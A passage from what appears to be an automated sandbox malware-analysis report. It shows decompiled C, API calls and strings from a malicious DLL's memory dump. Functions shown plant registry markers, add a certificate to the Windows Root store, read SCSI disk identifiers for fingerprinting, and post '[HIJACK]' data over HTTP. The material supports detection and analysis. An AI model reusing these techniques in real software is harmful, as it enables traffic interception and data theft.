                                                                                                                                                    0x1000e993
                                                                                                                                                    0x1000e999
                                                                                                                                                    0x1000e99e
                                                                                                                                                    0x1000e9a4
                                                                                                                                                    0x1000e9aa
                                                                                                                                                    0x1000e9af
                                                                                                                                                    0x1000e9b1
                                                                                                                                                    0x1000e9b2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000e9b8
                                                                                                                                                    0x1000e9b8
                                                                                                                                                    0x1000e9bd
                                                                                                                                                    0x1000e9bf
                                                                                                                                                    0x1000e9cb
                                                                                                                                                    0x1000e9d6
                                                                                                                                                    0x1000e9e0
                                                                                                                                                    0x1000e9e5
                                                                                                                                                    0x1000e9ea
                                                                                                                                                    0x1000e9ec
                                                                                                                                                    0x1000e9f5
                                                                                                                                                    0x1000e9fa
                                                                                                                                                    0x1000e9fc
                                                                                                                                                    0x1000ea1e
                                                                                                                                                    0x1000ea1e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000e9fe
                                                                                                                                                    0x1000e9fe
                                                                                                                                                    0x1000ea03
                                                                                                                                                    0x1000ea05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000ea07
                                                                                                                                                    0x1000ea09
                                                                                                                                                    0x1000ea0e
                                                                                                                                                    0x1000ea11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000ea13
                                                                                                                                                    0x1000ea13
                                                                                                                                                    0x1000eacc
                                                                                                                                                    0x1000eacc
                                                                                                                                                    0x1000eacc
                                                                                                                                                    0x1000ea11
                                                                                                                                                    0x1000ea05
                                                                                                                                                    0x1000e9ee
                                                                                                                                                    0x1000e9ee
                                                                                                                                                    0x1000e9ee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000e9ee
                                                                                                                                                    0x1000e9c1
                                                                                                                                                    0x1000e9c1
                                                                                                                                                    0x1000e9c1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000e9c1
                                                                                                                                                    0x1000e9bf
                                                                                                                                                    0x1000e942
                                                                                                                                                    0x1000e945
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000e945
                                                                                                                                                    0x1000e92b
                                                                                                                                                    0x1000e92b
                                                                                                                                                    0x1000e92b
                                                                                                                                                    0x1000e92b
                                                                                                                                                    0x1000ead1

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2870529951-0
                                                                                                                                                    • Opcode ID: 33597e8d992ae2701a1a105f9cd40d877ad7e31c20db9df51a46f2ceb3783ac1
                                                                                                                                                    • Instruction ID: 8458d78fb8ea846ce061281ff3815fc36cb29502d2944e0801359947cb4616d4
                                                                                                                                                    • Opcode Fuzzy Hash: 33597e8d992ae2701a1a105f9cd40d877ad7e31c20db9df51a46f2ceb3783ac1
                                                                                                                                                    • Instruction Fuzzy Hash: 21318279A043919BF750DFB28CC175A37E8EF44381F218429E905E6256EB34EC418B61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001FA30, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t57;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF20(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF20(_t77,  &_v267, 0, 0x103);
				E1001F990(__ebx, _t77, __esi, _t94,  &_v268); // executed
				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8); // executed
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
								_t99 = _t52;
								if(_t52 != 0) {
									_t54 = E1001F5F0(_a4, _t99,  &_v804, _a4, _a8); // executed
									if(_t54 != 0) {
										_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8); // executed
										_t101 = _t55;
										if(_t55 != 0) {
											_t57 = E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
											if(_t57 != 0) {
												_v536 = 1;
											}
										}
									}
								}
							}
						}
					}
				}
				return _v536;
			}



















                                                                                                                                                    0x1001fa30
                                                                                                                                                    0x1001fa30
                                                                                                                                                    0x1001fa39
                                                                                                                                                    0x1001fa43
                                                                                                                                                    0x1001fa58
                                                                                                                                                    0x1001fa6d
                                                                                                                                                    0x1001fa84
                                                                                                                                                    0x1001fa8c
                                                                                                                                                    0x1001faa1
                                                                                                                                                    0x1001fab6
                                                                                                                                                    0x1001facd
                                                                                                                                                    0x1001fad5
                                                                                                                                                    0x1001faea
                                                                                                                                                    0x1001faf9
                                                                                                                                                    0x1001fb13
                                                                                                                                                    0x1001fb1b
                                                                                                                                                    0x1001fb1d
                                                                                                                                                    0x1001fb35
                                                                                                                                                    0x1001fb3d
                                                                                                                                                    0x1001fb3f
                                                                                                                                                    0x1001fb54
                                                                                                                                                    0x1001fb5c
                                                                                                                                                    0x1001fb5e
                                                                                                                                                    0x1001fb76
                                                                                                                                                    0x1001fb7e
                                                                                                                                                    0x1001fb80
                                                                                                                                                    0x1001fb94
                                                                                                                                                    0x1001fb9c
                                                                                                                                                    0x1001fb9e
                                                                                                                                                    0x1001fbaf
                                                                                                                                                    0x1001fbb9
                                                                                                                                                    0x1001fbc3
                                                                                                                                                    0x1001fbcb
                                                                                                                                                    0x1001fbcd
                                                                                                                                                    0x1001fbe3
                                                                                                                                                    0x1001fbed
                                                                                                                                                    0x1001fbef
                                                                                                                                                    0x1001fbef
                                                                                                                                                    0x1001fbed
                                                                                                                                                    0x1001fbcd
                                                                                                                                                    0x1001fbb9
                                                                                                                                                    0x1001fb9e
                                                                                                                                                    0x1001fb80
                                                                                                                                                    0x1001fb5e
                                                                                                                                                    0x1001fb3f
                                                                                                                                                    0x1001fc02

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                    • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                    • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                      • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                      • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                      • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                      • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                      • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                      • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                      • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                      • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                      • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                      • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                    Strings
                                                                                                                                                    • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                    • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                    • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                    • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                    • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                    • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                    • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                    • API String ID: 475603772-4188859120
                                                                                                                                                    • Opcode ID: 7afbe86bc4ec4f535f650feca8958e2ec551eefd7deb2f21c9708c2824f864a1
                                                                                                                                                    • Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
                                                                                                                                                    • Opcode Fuzzy Hash: 7afbe86bc4ec4f535f650feca8958e2ec551eefd7deb2f21c9708c2824f864a1
                                                                                                                                                    • Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001D560, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E1001D560(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				void* _t79;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v32 = _t79;
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF20(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed
							if(_t87 == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CD70( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							FindCloseChangeNotification(_v32); // executed
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}


































                                                                                                                                                    0x1001d560
                                                                                                                                                    0x1001d569
                                                                                                                                                    0x1001d570
                                                                                                                                                    0x1001d57a
                                                                                                                                                    0x1001d581
                                                                                                                                                    0x1001d591
                                                                                                                                                    0x1001d597
                                                                                                                                                    0x1001d5b0
                                                                                                                                                    0x1001d5b6
                                                                                                                                                    0x1001d5bd
                                                                                                                                                    0x1001d5c3
                                                                                                                                                    0x1001d5ca
                                                                                                                                                    0x1001d5e5
                                                                                                                                                    0x1001d5ea
                                                                                                                                                    0x1001d5ed
                                                                                                                                                    0x1001d5f7
                                                                                                                                                    0x1001d604
                                                                                                                                                    0x1001d60a
                                                                                                                                                    0x1001d614
                                                                                                                                                    0x1001d61e
                                                                                                                                                    0x1001d628
                                                                                                                                                    0x1001d632
                                                                                                                                                    0x1001d660
                                                                                                                                                    0x1001d668
                                                                                                                                                    0x1001d76e
                                                                                                                                                    0x1001d775
                                                                                                                                                    0x1001d78d
                                                                                                                                                    0x1001d777
                                                                                                                                                    0x1001d780
                                                                                                                                                    0x1001d786
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d788
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d788
                                                                                                                                                    0x1001d786
                                                                                                                                                    0x1001d67d
                                                                                                                                                    0x1001d67d
                                                                                                                                                    0x1001d684
                                                                                                                                                    0x1001d692
                                                                                                                                                    0x1001d69f
                                                                                                                                                    0x1001d6a2
                                                                                                                                                    0x1001d6b2
                                                                                                                                                    0x1001d6b7
                                                                                                                                                    0x1001d6ba
                                                                                                                                                    0x1001d6bd
                                                                                                                                                    0x1001d6c7
                                                                                                                                                    0x1001d6d1
                                                                                                                                                    0x1001d6dd
                                                                                                                                                    0x1001d6e3
                                                                                                                                                    0x1001d6fa
                                                                                                                                                    0x1001d709
                                                                                                                                                    0x1001d719
                                                                                                                                                    0x1001d724
                                                                                                                                                    0x1001d72d
                                                                                                                                                    0x1001d730
                                                                                                                                                    0x1001d733
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d735
                                                                                                                                                    0x1001d741
                                                                                                                                                    0x1001d74a
                                                                                                                                                    0x1001d750
                                                                                                                                                    0x1001d750
                                                                                                                                                    0x1001d70b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d70b
                                                                                                                                                    0x1001d75a
                                                                                                                                                    0x1001d760
                                                                                                                                                    0x1001d76a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d76c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d76c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d76a
                                                                                                                                                    0x1001d73d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d73f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d73d
                                                                                                                                                    0x1001d79e
                                                                                                                                                    0x1001d7a2
                                                                                                                                                    0x1001d7ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d7ab
                                                                                                                                                    0x1001d794
                                                                                                                                                    0x1001d794
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d794
                                                                                                                                                    0x1001d7ae
                                                                                                                                                    0x1001d7b4
                                                                                                                                                    0x1001d7ba
                                                                                                                                                    0x1001d7bd
                                                                                                                                                    0x1001d7d0

                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                    • CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                    • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                    • DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D660
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D7A2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
                                                                                                                                                    • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                    • API String ID: 2954624657-153650326
                                                                                                                                                    • Opcode ID: 46cef430e950231049180ada33881308f6ef08b86b0426272f45b274a3dc641a
                                                                                                                                                    • Instruction ID: 97644cbbe0fa13e9fa77214cf96e2aef8ff5ccb5ab3d54e7fabe9ad20e5a76b0
                                                                                                                                                    • Opcode Fuzzy Hash: 46cef430e950231049180ada33881308f6ef08b86b0426272f45b274a3dc641a
                                                                                                                                                    • Instruction Fuzzy Hash: C3613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 10022600, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 138COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                    			E10022600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v72;
				char _v100;
				char _v128;
				intOrPtr _v132;
				char _v160;
				char _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				void* __ebp;
				char* _t56;
				void* _t75;
				void* _t76;
				intOrPtr _t119;
				void* _t127;

				_t127 = __eflags;
				_t118 = __esi;
				_t117 = __edi;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(E10022AB7);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_v192 = 0;
				_push(_a12);
				_push(0x2b);
				_push("post_info");
				_t56 = PathFindFileNameA(".\\post_info.cpp"); // executed
				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t56); // executed
				_v132 = E100221E0(__ebx, __edi, __esi, _t127, _a12);
				E100223C0(__ebx, __edi, __esi, _t127,  &_v128);
				_v8 = 0;
				_v196 = E10001160( &_v160, _t127, _a8);
				_v200 = _v196;
				_v8 = 1;
				E10001A90( &_v128, _v200);
				_v8 = 0;
				E100011A0( &_v160);
				E10001160( &_v100, _t127, "info=");
				_v8 = 2;
				_v204 = E10001160( &_v188, _t127, _v132);
				_v208 = _v204;
				_v8 = 3;
				E10001A90( &_v100, _v208);
				_v8 = 2;
				E100011A0( &_v188);
				_push(E100011E0( &_v128));
				_push(0x38);
				_push("post_info");
				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
				E10001160( &_v44, _t127, 0x10024ca2);
				_v8 = 4;
				E10001160( &_v72, _t127, 0x10024ca3);
				_v8 = 5;
				_t75 = E10001200( &_v100);
				_t76 = E100011E0( &_v100);
				E100218E0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72); // executed
				_push(_v132);
				E1000CA30(_t87, _t117, _t118, _t127);
				E10001110(_a4, _t127,  &_v72);
				_v192 = _v192 | 0x00000001;
				_v8 = 4;
				E100011A0( &_v72);
				_v8 = 2;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v100);
				_v8 = 0xffffffff;
				E100011A0( &_v128);
				 *[fs:0x0] = _v16;
				return _a4;
			}























                                                                                                                                                    0x10022600
                                                                                                                                                    0x10022600
                                                                                                                                                    0x10022600
                                                                                                                                                    0x10022600
                                                                                                                                                    0x10022603
                                                                                                                                                    0x10022605
                                                                                                                                                    0x10022610
                                                                                                                                                    0x10022611
                                                                                                                                                    0x1002261e
                                                                                                                                                    0x1002262b
                                                                                                                                                    0x1002262c
                                                                                                                                                    0x1002262e
                                                                                                                                                    0x10022638
                                                                                                                                                    0x10022644
                                                                                                                                                    0x10022658
                                                                                                                                                    0x1002265f
                                                                                                                                                    0x10022667
                                                                                                                                                    0x1002267d
                                                                                                                                                    0x10022689
                                                                                                                                                    0x1002268f
                                                                                                                                                    0x1002269d
                                                                                                                                                    0x100226a2
                                                                                                                                                    0x100226ac
                                                                                                                                                    0x100226b9
                                                                                                                                                    0x100226be
                                                                                                                                                    0x100226d1
                                                                                                                                                    0x100226dd
                                                                                                                                                    0x100226e3
                                                                                                                                                    0x100226f1
                                                                                                                                                    0x100226f6
                                                                                                                                                    0x10022700
                                                                                                                                                    0x1002270d
                                                                                                                                                    0x1002270e
                                                                                                                                                    0x10022710
                                                                                                                                                    0x10022726
                                                                                                                                                    0x10022736
                                                                                                                                                    0x1002273b
                                                                                                                                                    0x10022747
                                                                                                                                                    0x1002274c
                                                                                                                                                    0x10022767
                                                                                                                                                    0x10022770
                                                                                                                                                    0x1002278b
                                                                                                                                                    0x10022796
                                                                                                                                                    0x10022797
                                                                                                                                                    0x100227a6
                                                                                                                                                    0x100227b4
                                                                                                                                                    0x100227ba
                                                                                                                                                    0x100227c1
                                                                                                                                                    0x100227c6
                                                                                                                                                    0x100227cd
                                                                                                                                                    0x100227d2
                                                                                                                                                    0x100227d9
                                                                                                                                                    0x100227de
                                                                                                                                                    0x100227e8
                                                                                                                                                    0x100227f3
                                                                                                                                                    0x100227fd

                                                                                                                                                    APIs
                                                                                                                                                    • PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,0000002B,?), ref: 10022638
                                                                                                                                                      • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                      • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022649,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                      • Part of subcall function 100221E0: _memset.LIBCMT ref: 10022234
                                                                                                                                                      • Part of subcall function 100221E0: _strlen.LIBCMT ref: 10022268
                                                                                                                                                      • Part of subcall function 100221E0: _memset.LIBCMT ref: 100222D6
                                                                                                                                                      • Part of subcall function 100221E0: _strlen.LIBCMT ref: 100222E2
                                                                                                                                                      • Part of subcall function 100223C0: _memset.LIBCMT ref: 10022414
                                                                                                                                                      • Part of subcall function 100223C0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022435
                                                                                                                                                      • Part of subcall function 100223C0: _sprintf.LIBCMT ref: 1002246A
                                                                                                                                                      • Part of subcall function 100223C0: _sprintf.LIBCMT ref: 10022501
                                                                                                                                                    • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000038,00000000,?,?,info=,?,?), ref: 1002271A
                                                                                                                                                      • Part of subcall function 100218E0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021A14
                                                                                                                                                      • Part of subcall function 100218E0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021A5C
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,10330FC8,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,10330FC8), ref: 1000CAA9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$FileFindHttpNamePath_sprintf_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block
                                                                                                                                                    • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                    • API String ID: 1791729089-152146038
                                                                                                                                                    • Opcode ID: f6b99e69aa3333ffb294e979470f4fd029fdcd2e92949664cb4d58670fc8cbcc
                                                                                                                                                    • Instruction ID: fa83fd74b3c799adcc35aea74cf052f81feffce0395cdb50740169bd032f5941
                                                                                                                                                    • Opcode Fuzzy Hash: f6b99e69aa3333ffb294e979470f4fd029fdcd2e92949664cb4d58670fc8cbcc
                                                                                                                                                    • Instruction Fuzzy Hash: C4516075D01248EBEB14DB94DC52FEEBB74EF18380F508198F60567286DB706B04CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001FC70, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001FC70(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;
				void* _t22;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF20(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
